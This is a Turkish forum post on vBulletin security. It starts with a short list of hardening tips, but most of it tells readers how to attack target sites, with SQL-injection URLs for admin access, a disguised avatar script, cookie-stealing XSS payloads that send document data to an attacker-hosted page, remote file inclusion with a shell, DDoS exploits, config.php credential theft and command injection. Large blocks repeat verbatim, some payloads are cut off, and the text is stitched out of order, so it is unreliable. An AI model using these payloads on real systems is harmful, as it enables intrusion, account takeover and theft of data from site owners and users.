vBulletin Tüm açıkları ve Kapama Yöntemleri
1 sayfadaki 1 sayfası
vBulletin Tüm açıkları ve Kapama Yöntemleri
Arkadaşlar Böyle Bi Döküman Elime Geçti Bende Sizlerle paylaşmak istedim Umarım işinize yarar...
1-) Forumunuzu daima en yüksek sürümlere upgrade edin.
2-) Hiç bir hack ve plugin yüklemeyin (Özellikle PHP dosyalarından değişiklik yapılanları). Tertemiz bir VBulletini hacklemek neredeyse imkansızdır. Oluşan açıklar genelde yaptığınız eklentilerden ve hostunuzdan kaynaklanır.
3-) Admin ve mod kontrol panellerinin şifrelerini koruyun. Ayrıntılı (İngilizce) açıklamaya buradan ulaşabilirsiniz.
4-) Tools.php dosyasının (vB3) websitenizde bulunmadığından emin olun. Bu dosya kesinlikle upload edilmemelidir. İşi bittikten sonra silinmelidir.
5-) phpMyAdmin kullanıyorsanız, giriş kısmının şifrelendiğinden emin olun. Aksi taktirde herkes ulaşabilir.
6-) Herhangi bir saldırıdan sonra tüm cpanel, FTP ve admin şifrelerinizi değiştirin.
7-) Admin ve mod şifrelerinin en az 9-10 karakter olmasına, bu karakterlerin sayı ve harflerden oluşmasına dikkat edin. Şifreleriniz MD5 şeklinde şifrelendiği için hem harf hemde rakamla oluşan 10 karakterli bir şifrenin çözülmesi imkasız bile olabilir.
8-) FORUMUNUZDA ASLA HTML KULLANIMINA İZİN VERMEYİN.
9-) Forumunuzu kurduktan sonra install klasörünüdeki install.php ve upgrade1.php adlı dosyaları silin.
10-) Sitenizi sağlam hostlara kurun. Forumunuz ne kadar güvenli olursa olsun hostunuz saldırı yediği zaman sizde etkileneceksiniz.
11-) Sık sık DATABASE yedeği alın. Bazı Hosting firmaları her gün yedek alım işlemlerini gerçekleştirmektedir. Ben günde 3-4 kez yedek alıyorum. Böylece saldırı yiyip, tablolara ve foruma herhangi bir zarar gelirse 4-5 saatlik zararla atlatıyorum.
Ben bu işlemlerin hepsini uyguluyorum. Siteme ne saldırı geldiyse hostun zayıflığı yüzünden geldi. O yüzden sağlam hostlar seçin. Her zaman en güvenli hostlar FREE hostlardır.
-------->
Bu kısımı forumda daha önce yazmıştım ama bu dökümanın içinde de olması daha uygun oldu...
-------->
VBulletin’e Karşı Yapılabilecek Saldırılar;
Not: Aslında bu kısım hacking ağırlıklı ama bir hacker gibi düşünmeden kendinizi hackerlerden koruyamazsınız. Bu yazıyı hazırlamamın sebebi çoğu arkadaşımızın lamerler tarafından hacklenmesidir. Ve hangi açıklar yüzünden hacklendiklerini bilmemeleridir. Ayrıca acemilerin bazı yerleri anlamayacaklarını tahmin ediyorum. Sormak istediğiniz yerler olursa sorabilirsiniz.
Yazımın bundan sonraki bölümü hackerleri daha çok ilgilendiriyor J Şimdi başlıklar halinde sizlere vbulletinin birçok açığını anlatacağım; [NOT: Bazı açıklar çok eski olduğu için hedef site bulmak zor olabilir] Öncelikle SQL Enjeksiyon, RFI ve exploit açıkları ile başlıyorum;
1-) LAST.PHP Dosyasını SQL Enjeksiyona Uğratmak;
b color=#0000ffhttp://www.hedefsite.com/last.php?fs...TiTle,user.%20/b (b color=#0000ffhttp://www.hedefsite.com/last.php?fs...TiTle,user.%20/b) %20%20%20username%20as%20lastposter%20FROM%20user, thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT %201
Hedef site yerine hedef sitenizin adresini yazın ve URL’yi browserda çalıştırın. Eğer açık mevcutsa siteye admin olarak giriş yapabileceksiniz.
Açık Bulunma Tarihi: 2004-11-15
2-) MISC.PHP Dosyasını PHP Enjeksiyonuna Uğratmak;
Önemli : vBulletin 3.06 sürümü aşağısı için geçerlidir. 3.0.1’de test edilmiştir.
[Linkleri görebilmek için üye olun veya giriş yapın.]
Hedefsite kısmına saldırı yapacağınız siteyi yazıp URL’yi browserda çalıştırın.
Açık Bulunma Tarihi: 2005-02-22
3-) Avatarların İçine Kod Gizleyerek Üyeleri Log-out etmek [ =<---3.0.7 versiyon]
<?php
header("Location: ;" target="_blank">http://www.site.com/forum/login.php?logout=true";
exit;
?>
Site.com yazan yere hedef sitenin adresini yazın. Ve kodu .jpg olarak kaydedin. Kaydetdiğiniz bu jpg’yi avatarınızı olarak upload edin. Şimdi mesajlarınızı görüntüleyen herkes otomatik olarak logout olacaktır.
4-) Shoutbox Açığı;
vBulletinin eklentilerinden olan Shoutbox yani chatleşme modülünde HTML kodu aktifse yani kullanılabiliyorsa şu kodu shout [chat mesajı] olarak gönderin.
<pre a=’>’ onmouseover=’document.location="http://www.yönlenecekadres.com?c="+document
1-) Forumunuzu daima en yüksek sürümlere upgrade edin.
2-) Hiç bir hack ve plugin yüklemeyin (Özellikle PHP dosyalarından değişiklik yapılanları). Tertemiz bir VBulletini hacklemek neredeyse imkansızdır. Oluşan açıklar genelde yaptığınız eklentilerden ve hostunuzdan kaynaklanır.
3-) Admin ve mod kontrol panellerinin şifrelerini koruyun. Ayrıntılı (İngilizce) açıklamaya buradan ulaşabilirsiniz.
4-) Tools.php dosyasının (vB3) websitenizde bulunmadığından emin olun. Bu dosya kesinlikle upload edilmemelidir. İşi bittikten sonra silinmelidir.
5-) phpMyAdmin kullanıyorsanız, giriş kısmının şifrelendiğinden emin olun. Aksi taktirde herkes ulaşabilir.
6-) Herhangi bir saldırıdan sonra tüm cpanel, FTP ve admin şifrelerinizi değiştirin.
7-) Admin ve mod şifrelerinin en az 9-10 karakter olmasına, bu karakterlerin sayı ve harflerden oluşmasına dikkat edin. Şifreleriniz MD5 şeklinde şifrelendiği için hem harf hemde rakamla oluşan 10 karakterli bir şifrenin çözülmesi imkasız bile olabilir.
8-) FORUMUNUZDA ASLA HTML KULLANIMINA İZİN VERMEYİN.
9-) Forumunuzu kurduktan sonra install klasörünüdeki install.php ve upgrade1.php adlı dosyaları silin.
10-) Sitenizi sağlam hostlara kurun. Forumunuz ne kadar güvenli olursa olsun hostunuz saldırı yediği zaman sizde etkileneceksiniz.
11-) Sık sık DATABASE yedeği alın. Bazı Hosting firmaları her gün yedek alım işlemlerini gerçekleştirmektedir. Ben günde 3-4 kez yedek alıyorum. Böylece saldırı yiyip, tablolara ve foruma herhangi bir zarar gelirse 4-5 saatlik zararla atlatıyorum.
Ben bu işlemlerin hepsini uyguluyorum. Siteme ne saldırı geldiyse hostun zayıflığı yüzünden geldi. O yüzden sağlam hostlar seçin. Her zaman en güvenli hostlar FREE hostlardır.
-------->
Bu kısımı forumda daha önce yazmıştım ama bu dökümanın içinde de olması daha uygun oldu...
-------->
VBulletin’e Karşı Yapılabilecek Saldırılar;
Not: Aslında bu kısım hacking ağırlıklı ama bir hacker gibi düşünmeden kendinizi hackerlerden koruyamazsınız. Bu yazıyı hazırlamamın sebebi çoğu arkadaşımızın lamerler tarafından hacklenmesidir. Ve hangi açıklar yüzünden hacklendiklerini bilmemeleridir. Ayrıca acemilerin bazı yerleri anlamayacaklarını tahmin ediyorum. Sormak istediğiniz yerler olursa sorabilirsiniz.
Yazımın bundan sonraki bölümü hackerleri daha çok ilgilendiriyor J Şimdi başlıklar halinde sizlere vbulletinin birçok açığını anlatacağım; [NOT: Bazı açıklar çok eski olduğu için hedef site bulmak zor olabilir] Öncelikle SQL Enjeksiyon, RFI ve exploit açıkları ile başlıyorum;
1-) LAST.PHP Dosyasını SQL Enjeksiyona Uğratmak;
b color=#0000ffhttp://www.hedefsite.com/last.php?fs...TiTle,user.%20/b (b color=#0000ffhttp://www.hedefsite.com/last.php?fs...TiTle,user.%20/b) %20%20%20username%20as%20lastposter%20FROM%20user, thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT %201
Hedef site yerine hedef sitenizin adresini yazın ve URL’yi browserda çalıştırın. Eğer açık mevcutsa siteye admin olarak giriş yapabileceksiniz.
Açık Bulunma Tarihi: 2004-11-15
2-) MISC.PHP Dosyasını PHP Enjeksiyonuna Uğratmak;
Önemli : vBulletin 3.06 sürümü aşağısı için geçerlidir. 3.0.1’de test edilmiştir.
[Linkleri görebilmek için üye olun veya giriş yapın.]
Hedefsite kısmına saldırı yapacağınız siteyi yazıp URL’yi browserda çalıştırın.
Açık Bulunma Tarihi: 2005-02-22
3-) Avatarların İçine Kod Gizleyerek Üyeleri Log-out etmek [ =<---3.0.7 versiyon]
<?php
header("Location: ;" target="_blank">http://www.site.com/forum/login.php?logout=true";
exit;
?>
Site.com yazan yere hedef sitenin adresini yazın. Ve kodu .jpg olarak kaydedin. Kaydetdiğiniz bu jpg’yi avatarınızı olarak upload edin. Şimdi mesajlarınızı görüntüleyen herkes otomatik olarak logout olacaktır.
4-) Shoutbox Açığı;
vBulletinin eklentilerinden olan Shoutbox yani chatleşme modülünde HTML kodu aktifse yani kullanılabiliyorsa şu kodu shout [chat mesajı] olarak gönderin.
<pre a=’>’ onmouseover=’document.location="http://www.yönlenecekadres.com?c="+document
Geri: vBulletin Tüm açıkları ve Kapama Yöntemleri
Forumunuzu upgrade ederken install klasörü içinde upgrade1.php dosyası oluşur. Eğer admin upgrade sonrası bu dosyayı silmemişse vbulletin tablolarına, dolayısı ile user tablesindeki MD5 şeklinde kriptolanmış admin şifrelerine ulaşabilirsiniz.
b color=#0000ffwww.hedef.com/forum/install/upgrade1.php/b (b color=#0000ffhttp://www.hedef.com/forum/install/upgrade1.php/b)
Hedef yerine hedef sitesinizi yazıp URL’yi browserda çalıştırın. Açık varsa tablolara ulaşabilirsiniz. Bir ara bu açık benim sitemde de vardı. 3.0.9 için tarafımca test edilmiştir yani J Sanırım tüm sürümler için geçerli...
7-) Admincp’den Alınan Yedekleri Bulmak [<-- 3.0.8]:
Admincpden alınan yedekler doğruca .sql şeklinde FTP’ye yollanır. Şimdi vereceğim exploit ile bu yedeklerin yerlerini bulabilecek, dolayısı ile yedeği indirebileceksiniz. Yedeği indirip user tablosundaki adminin şifresini kırıp admincpye ulaşabilirsiniz. Exploit C exploitidir. Şimdi exploit nasıl kullanılır onu anlatmayacağım, öncelikle compile etmeniz gerekiyor...
Exploit linki: b color=#0000ffhttp://www.xxxx.com/vbulletin_p...r_exploit1.txt/b (b color=#0000ffhttp://www.xxxx.com/vbulletin_p...r_exploit1.txt/b)
Bu exploiti kullanarak dediğim gibi admincp aracılığı ile alınan yedekleri bulup, indirebilirsiniz.
8-) MKPortal ile Entegrasyon Edilmiş Vbulletinleri Hacklemek;
MKPortal 1.1 ile entegre edilmiş tüm Vbulletin versiyonları için geçerlidir. Kullanımı şu şekildedir;
b color=#0000ffhttp://hedef.com/index.php?ind=/b (b color=#0000ffhttp://hedef.com/index.php?ind=)/b[SQL]
SQL yerine herhangi bir SQL kodu yazabilirsiniz. Mesela;
b color=#0000ffhttp://hedef.com/index.php?ind=’,userid=’1/b (b color=#0000ffhttp://hedef.com/index.php?ind=’,userid=’1/b)
Bu kodu browserda çalıştırırsanız siteye admin olarak giriş yaparsınız. Ayrıca XSS açığıda mevcuttur;
b color=#0000ffhttp://hedef.com/includes/pm_popup.php?u1=/b (b color=#0000ffhttp://hedef.com/includes/pm_popup.php?u1=)/b[XSS]&m1=[XSS]&m2=[XSS]&m3=[XSS]&m4=[XSS]
Bu URL’yi ise browserda çalıştırarak XSS saldırısı gerçekleştirebilirsiniz. URL’deki XSS yazan kısımları editlemeniz gerekiyor.
9-) İmpex RFI Saldırısı:
Öncelikle b color=#0000ffhttp://www.xxxx.com/vbulletin_p...r_exploit2.txt/b (b color=#0000ffhttp://www.xxxx.com/vbulletin_p...r_exploit2.txt/b) adresindeki kodları .php dosyası olarak kaydedin ve herhangi bir hosta kaydedip browserda çalıştırın. Gerekli yerleri doldurarak saldırıyı gerçekleştirebilirsiniz. Veya kısa yoldan b color=#0000ffhttp://www.hedef.com/impex/ImpExData...shelladresiniz/b (b color=#0000ffhttp://www.hedef.com/impex/ImpExData...shelladresiniz/b) hedef yerine hedefsiteyi, fsoshelladresiniz kısmınada herhangi bir Shell adresi yazarak RFI saldırısı gerçekleştirebilirsiniz.
Herhalde Impex’in kurulu olduğu vbulletinlerde çalıştığını söylememe gerek yoktur.
10-) DDOS Saldırıları;
Denyo Launch adlı programla sitede İmage Vertication yani üye olurken resim kodu doğrulama kısmı yoksa siteye DDOS atakları yapabilir, yüzlerce üye oluşturabilirsiniz Ayrıca
VBulletin forumlara DDOS saldırısı yapmak için kodlanmış PERL exploitlerini de kullanabilirsiniz.
Mesela b color=#0000ffhttp://www.xxxx.com/vbulletin_p...r_exploit3.txt/b (b color=#0000ffhttp://www.xxxxx.com/vbulletin_p...r_exploit3.txt/b) bu exploit ile 3.5.3 ve altı sürümlere DDOS atağı yapabilirsiniz. Kodları .pl olarak kaydedin ve Active Perl yardımıyla kodları compile edip saldırıyı gerçekleştirin.
11-) Okunabilir Config.php ile Hack;
İncludes/config.php dosyası 777 yani okunabilir ve yazılabilir olarak ayarlanmışsa;
b color=#0000ffwww.hedefsite.com/includes/config.php/b (b color=#0000ffhttp://www.hedefsite.com/includes/config.php/b) linkini kullanarak config.php dosyasını okuyabilirsiniz. Burada host tipinde localhost dışında bir değer varsa [mysql.host.com gibi] veritabanı kullanıcı adı, şifresi ve db adı ile vbulletin veritabanına uzaktan bağlantı sağlayabilirsiniz. Bunu nasıl yapabileceğiniz anlatmıyorum şimdilik. Eğer localhost değeri varsa site ile aynı hosttan hesap açın, aynı hosttaki hesabınızdan config.php de bulunan bilgilere göre vbulletin veritabanına ulaşım sağlayabilirsiniz. Ha bu arada mysql şifresinin, FTP ve Cpanel şifresi ile aynı olma ihtimalini göz ardı etmeyin Ki çoğu sitede aynıdır.
12-) Calander.php Açığı;
Çok eski bir açık ama neyse yinede bilmekte fayda var
b color=#0000ffhttp://www.hedefsite.com/calendar.ph...etday&day=2001/b (b color=#0000ffhttp://www.hedefsite.com/calendar.ph...etday&day=2001/b) -8-15&comma=“;echo%20’’;%20echo%20%60<command>%20% 6 0;die();echo“
Hedefsite.com yerine hedefsitenizi yazın, browserde çalıştırın, vBulletin 2.0.3 [peeh size çok eski demiştim ] sürümleri için geçerlidir.
13-) Vbulletin 3.0.7 Cookie Çalma Açığı;
Öncelikle b color=#0000ffhttp://www.xxxx.com/vbulletin_p...r_exploit4.txt/b (b color=#0000ffhttp://www.xxxxx.com/vbulletin_p...r_exploit4.txt/b) adresindeki kodları psphacker.php ismiyle php dosyası olarak kaydedin. Sonra herhangi bir hosta kaydedin.
onmouseover=’location.href= "http://www.phpdosyasınıuploadettiğinizadres.com/psphacker.php?nm=Black-code.net&re=http://www.linux-soul.net/vb/showthread.php?t=1245&id="+document
b color=#0000ffwww.hedef.com/forum/install/upgrade1.php/b (b color=#0000ffhttp://www.hedef.com/forum/install/upgrade1.php/b)
Hedef yerine hedef sitesinizi yazıp URL’yi browserda çalıştırın. Açık varsa tablolara ulaşabilirsiniz. Bir ara bu açık benim sitemde de vardı. 3.0.9 için tarafımca test edilmiştir yani J Sanırım tüm sürümler için geçerli...
7-) Admincp’den Alınan Yedekleri Bulmak [<-- 3.0.8]:
Admincpden alınan yedekler doğruca .sql şeklinde FTP’ye yollanır. Şimdi vereceğim exploit ile bu yedeklerin yerlerini bulabilecek, dolayısı ile yedeği indirebileceksiniz. Yedeği indirip user tablosundaki adminin şifresini kırıp admincpye ulaşabilirsiniz. Exploit C exploitidir. Şimdi exploit nasıl kullanılır onu anlatmayacağım, öncelikle compile etmeniz gerekiyor...
Exploit linki: b color=#0000ffhttp://www.xxxx.com/vbulletin_p...r_exploit1.txt/b (b color=#0000ffhttp://www.xxxx.com/vbulletin_p...r_exploit1.txt/b)
Bu exploiti kullanarak dediğim gibi admincp aracılığı ile alınan yedekleri bulup, indirebilirsiniz.
8-) MKPortal ile Entegrasyon Edilmiş Vbulletinleri Hacklemek;
MKPortal 1.1 ile entegre edilmiş tüm Vbulletin versiyonları için geçerlidir. Kullanımı şu şekildedir;
b color=#0000ffhttp://hedef.com/index.php?ind=/b (b color=#0000ffhttp://hedef.com/index.php?ind=)/b[SQL]
SQL yerine herhangi bir SQL kodu yazabilirsiniz. Mesela;
b color=#0000ffhttp://hedef.com/index.php?ind=’,userid=’1/b (b color=#0000ffhttp://hedef.com/index.php?ind=’,userid=’1/b)
Bu kodu browserda çalıştırırsanız siteye admin olarak giriş yaparsınız. Ayrıca XSS açığıda mevcuttur;
b color=#0000ffhttp://hedef.com/includes/pm_popup.php?u1=/b (b color=#0000ffhttp://hedef.com/includes/pm_popup.php?u1=)/b[XSS]&m1=[XSS]&m2=[XSS]&m3=[XSS]&m4=[XSS]
Bu URL’yi ise browserda çalıştırarak XSS saldırısı gerçekleştirebilirsiniz. URL’deki XSS yazan kısımları editlemeniz gerekiyor.
9-) İmpex RFI Saldırısı:
Öncelikle b color=#0000ffhttp://www.xxxx.com/vbulletin_p...r_exploit2.txt/b (b color=#0000ffhttp://www.xxxx.com/vbulletin_p...r_exploit2.txt/b) adresindeki kodları .php dosyası olarak kaydedin ve herhangi bir hosta kaydedip browserda çalıştırın. Gerekli yerleri doldurarak saldırıyı gerçekleştirebilirsiniz. Veya kısa yoldan b color=#0000ffhttp://www.hedef.com/impex/ImpExData...shelladresiniz/b (b color=#0000ffhttp://www.hedef.com/impex/ImpExData...shelladresiniz/b) hedef yerine hedefsiteyi, fsoshelladresiniz kısmınada herhangi bir Shell adresi yazarak RFI saldırısı gerçekleştirebilirsiniz.
Herhalde Impex’in kurulu olduğu vbulletinlerde çalıştığını söylememe gerek yoktur.
10-) DDOS Saldırıları;
Denyo Launch adlı programla sitede İmage Vertication yani üye olurken resim kodu doğrulama kısmı yoksa siteye DDOS atakları yapabilir, yüzlerce üye oluşturabilirsiniz Ayrıca
VBulletin forumlara DDOS saldırısı yapmak için kodlanmış PERL exploitlerini de kullanabilirsiniz.
Mesela b color=#0000ffhttp://www.xxxx.com/vbulletin_p...r_exploit3.txt/b (b color=#0000ffhttp://www.xxxxx.com/vbulletin_p...r_exploit3.txt/b) bu exploit ile 3.5.3 ve altı sürümlere DDOS atağı yapabilirsiniz. Kodları .pl olarak kaydedin ve Active Perl yardımıyla kodları compile edip saldırıyı gerçekleştirin.
11-) Okunabilir Config.php ile Hack;
İncludes/config.php dosyası 777 yani okunabilir ve yazılabilir olarak ayarlanmışsa;
b color=#0000ffwww.hedefsite.com/includes/config.php/b (b color=#0000ffhttp://www.hedefsite.com/includes/config.php/b) linkini kullanarak config.php dosyasını okuyabilirsiniz. Burada host tipinde localhost dışında bir değer varsa [mysql.host.com gibi] veritabanı kullanıcı adı, şifresi ve db adı ile vbulletin veritabanına uzaktan bağlantı sağlayabilirsiniz. Bunu nasıl yapabileceğiniz anlatmıyorum şimdilik. Eğer localhost değeri varsa site ile aynı hosttan hesap açın, aynı hosttaki hesabınızdan config.php de bulunan bilgilere göre vbulletin veritabanına ulaşım sağlayabilirsiniz. Ha bu arada mysql şifresinin, FTP ve Cpanel şifresi ile aynı olma ihtimalini göz ardı etmeyin Ki çoğu sitede aynıdır.
12-) Calander.php Açığı;
Çok eski bir açık ama neyse yinede bilmekte fayda var
b color=#0000ffhttp://www.hedefsite.com/calendar.ph...etday&day=2001/b (b color=#0000ffhttp://www.hedefsite.com/calendar.ph...etday&day=2001/b) -8-15&comma=“;echo%20’’;%20echo%20%60<command>%20% 6 0;die();echo“
Hedefsite.com yerine hedefsitenizi yazın, browserde çalıştırın, vBulletin 2.0.3 [peeh size çok eski demiştim ] sürümleri için geçerlidir.
13-) Vbulletin 3.0.7 Cookie Çalma Açığı;
Öncelikle b color=#0000ffhttp://www.xxxx.com/vbulletin_p...r_exploit4.txt/b (b color=#0000ffhttp://www.xxxxx.com/vbulletin_p...r_exploit4.txt/b) adresindeki kodları psphacker.php ismiyle php dosyası olarak kaydedin. Sonra herhangi bir hosta kaydedin.
onmouseover=’location.href= "http://www.phpdosyasınıuploadettiğinizadres.com/psphacker.php?nm=Black-code.net&re=http://www.linux-soul.net/vb/showthread.php?t=1245&id="+document
Similar topics
» vbulletin kurulumu
» Casus Yazılımlardan Korunma Yöntemleri
» Casus Yazılımlardan Korunma Yöntemleri
» vBulletin 3.8.3
» vBulletin Ora Style 3.7.x - 3.8.x
» Casus Yazılımlardan Korunma Yöntemleri
» Casus Yazılımlardan Korunma Yöntemleri
» vBulletin 3.8.3
» vBulletin Ora Style 3.7.x - 3.8.x
1 sayfadaki 1 sayfası
Bu forumun müsaadesi var:
Bu forumdaki mesajlara cevap veremezsiniz